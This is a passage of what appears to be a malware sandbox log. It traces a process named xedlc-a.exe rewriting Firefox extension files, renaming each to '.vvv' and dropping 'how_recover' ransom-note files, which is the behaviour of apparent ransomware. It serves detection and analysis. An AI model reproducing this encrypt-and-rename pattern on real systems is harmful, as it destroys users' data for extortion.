- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\timer.js
- filesize: 4208
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765853
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 81978
- mode: close
- sequenceNumber: 1284
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\timer.js
- filesize: 4638
- md5sum: 0a30fdb7bca6d4608fb55372eec381d8
- sha1sum: e60e513ffa403e29527b9e04742ba2561fdd35e5
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765853
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81991
- mode: rename
- sequenceNumber: 1285
- filesize: 4638
- md5sum: 0a30fdb7bca6d4608fb55372eec381d8
- sha1sum: e60e513ffa403e29527b9e04742ba2561fdd35e5
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\timer.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\timer.js.vvv
- ads:
- fid (ads:): 281474976765853
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82214
- mode: open
- sequenceNumber: 1286
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traceback.js
- filesize: 5081
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765891
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 82316
- mode: close
- sequenceNumber: 1287
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traceback.js
- filesize: 5502
- md5sum: f56a220df36eef77f824f0c858720f02
- sha1sum: 22598e075a61f0d25d876fec777a00d6d4efa6c3
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765891
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82355
- mode: rename
- sequenceNumber: 1288
- filesize: 5502
- md5sum: f56a220df36eef77f824f0c858720f02
- sha1sum: 22598e075a61f0d25d876fec777a00d6d4efa6c3
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traceback.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traceback.js.vvv
- ads:
- fid (ads:): 281474976765891
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82367
- mode: open
- sequenceNumber: 1289
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits\core.js
- filesize: 11340
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765870
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 82479
- mode: close
- sequenceNumber: 1290
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits\core.js
- filesize: 11758
- md5sum: 2e2601f7c5b94ac14ccdd8b5dee4ec81
- sha1sum: c00b3387ef36c628ff080d05048ef2bbb18f3a03
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765870
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82492
- mode: rename
- sequenceNumber: 1291
- filesize: 11758
- md5sum: 2e2601f7c5b94ac14ccdd8b5dee4ec81
- sha1sum: c00b3387ef36c628ff080d05048ef2bbb18f3a03
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits\core.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits\core.js.vvv
- ads:
- fid (ads:): 281474976765870
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82504
- mode: created
- sequenceNumber: 1292
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778353
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 82512
- mode: close
- sequenceNumber: 1293
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778353
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82587
- mode: created
- sequenceNumber: 1294
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778354
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 82596
- mode: close
- sequenceNumber: 1295
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778354
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82605
- mode: open
- sequenceNumber: 1296
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits.js
- filesize: 7550
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765893
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 82650
- mode: close
- sequenceNumber: 1297
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits.js
- filesize: 7966
- md5sum: 474a76c62e29a82cdcb0404bd08efe2c
- sha1sum: f60d690862b13e79ef3c64b2b8bfa07224566e7a
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765893
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82662
- mode: rename
- sequenceNumber: 1298
- filesize: 7966
- md5sum: 474a76c62e29a82cdcb0404bd08efe2c
- sha1sum: f60d690862b13e79ef3c64b2b8bfa07224566e7a
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits.js.vvv
- ads:
- fid (ads:): 281474976765893
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82676
- mode: open
- sequenceNumber: 1299
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\type.js
- filesize: 11432
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476272
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 82712
- mode: close
- sequenceNumber: 1300
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\type.js
- filesize: 11854
- md5sum: e4f0cbe7bd2a11b9659b6e575a24264f
- sha1sum: 73e16ff728826269b62b3f26e6b88d600a9a3b00
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476272
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82724
- mode: rename
- sequenceNumber: 1301
- filesize: 11854
- md5sum: e4f0cbe7bd2a11b9659b6e575a24264f
- sha1sum: 73e16ff728826269b62b3f26e6b88d600a9a3b00
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\type.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\type.js.vvv
- ads:
- fid (ads:): 562949953476272
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82736
- mode: open
- sequenceNumber: 1302
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unit-test-finder.js
- filesize: 3479
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765881
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 82891
- mode: close
- sequenceNumber: 1303
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unit-test-finder.js
- filesize: 3902
- md5sum: 9c2cca59f1d27e8db9626c5bf8e21293
- sha1sum: 10f1b9672c8d3e4f140432aa1778ea76e23dff04
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765881
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82904
- mode: rename
- sequenceNumber: 1304
- filesize: 3902
- md5sum: 9c2cca59f1d27e8db9626c5bf8e21293
- sha1sum: 10f1b9672c8d3e4f140432aa1778ea76e23dff04
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unit-test-finder.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unit-test-finder.js.vvv
- ads:
- fid (ads:): 281474976765881
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82916
- mode: open
- sequenceNumber: 1305
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unit-test.js
- filesize: 11539
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765883
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83108
- mode: close
- sequenceNumber: 1306
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unit-test.js
- filesize: 11966
- md5sum: 244363e6192522099f35fdc3ac59790d
- sha1sum: 4adb5e6341bba1ad3f994c3392a6281171cf2d28
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765883
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83121
- mode: rename
- sequenceNumber: 1307
- filesize: 11966
- md5sum: 244363e6192522099f35fdc3ac59790d
- sha1sum: 4adb5e6341bba1ad3f994c3392a6281171cf2d28
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unit-test.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unit-test.js.vvv
- ads:
- fid (ads:): 281474976765883
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83133
- mode: open
- sequenceNumber: 1308
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unload.js
- filesize: 1278
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476254
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83141
- mode: close
- sequenceNumber: 1309
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unload.js
- filesize: 1694
- md5sum: a3102a738b335863760fe02b41dbf2e3
- sha1sum: e7cd74752fbc4dc59fce40ec8dfd2892aecf6252
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476254
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83153
- mode: rename
- sequenceNumber: 1310
- filesize: 1694
- md5sum: a3102a738b335863760fe02b41dbf2e3
- sha1sum: e7cd74752fbc4dc59fce40ec8dfd2892aecf6252
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unload.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unload.js.vvv
- ads:
- fid (ads:): 562949953476254
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83166
- mode: open
- sequenceNumber: 1311
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url-e10s-adapter.js
- filesize: 4008
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765914
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83234
- mode: close
- sequenceNumber: 1312
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url-e10s-adapter.js
- filesize: 4430
- md5sum: f0420d1676881ac23bcc299e6e4d2faf
- sha1sum: b7da9ab3c142e8c373b4b7dc308ab29d2d87fd02
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765914
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83247
- mode: rename
- sequenceNumber: 1313
- filesize: 4430
- md5sum: f0420d1676881ac23bcc299e6e4d2faf
- sha1sum: b7da9ab3c142e8c373b4b7dc308ab29d2d87fd02
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url-e10s-adapter.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url-e10s-adapter.js.vvv
- ads:
- fid (ads:): 281474976765914
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83258
- mode: open
- sequenceNumber: 1314
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url.js
- filesize: 4269
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765852
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83333
- mode: close
- sequenceNumber: 1315
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url.js
- filesize: 4686
- md5sum: 4d808c1edcba1ed50a0e096568b3b57f
- sha1sum: a7a1931bb1c946fb8b790b80f592067e52cecf80
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765852
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83346
- mode: rename
- sequenceNumber: 1316
- filesize: 4686
- md5sum: 4d808c1edcba1ed50a0e096568b3b57f
- sha1sum: a7a1931bb1c946fb8b790b80f592067e52cecf80
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url.js.vvv
- ads:
- fid (ads:): 281474976765852
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83361
- mode: open
- sequenceNumber: 1317
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\data.js
- filesize: 3912
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765877
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83423
- mode: close
- sequenceNumber: 1318
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\data.js
- filesize: 4334
- md5sum: a9390ab0bd8617f9e6a43d8fb361478e
- sha1sum: 350e075d9b77658a977bf43d490e95089df42d2f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765877
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83437
- mode: rename
- sequenceNumber: 1319
- filesize: 4334
- md5sum: a9390ab0bd8617f9e6a43d8fb361478e
- sha1sum: 350e075d9b77658a977bf43d490e95089df42d2f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\data.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\data.js.vvv
- ads:
- fid (ads:): 281474976765877
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83451
- mode: open
- sequenceNumber: 1320
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\function.js
- filesize: 2710
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476245
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83461
- mode: close
- sequenceNumber: 1321
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\function.js
- filesize: 3134
- md5sum: 76306ae62aa34d21afd7116466fc62f1
- sha1sum: 1e31000b0212daff70267475dcaa3ea987392437
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476245
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83512
- mode: rename
- sequenceNumber: 1322
- filesize: 3134
- md5sum: 76306ae62aa34d21afd7116466fc62f1
- sha1sum: 1e31000b0212daff70267475dcaa3ea987392437
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\function.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\function.js.vvv
- ads:
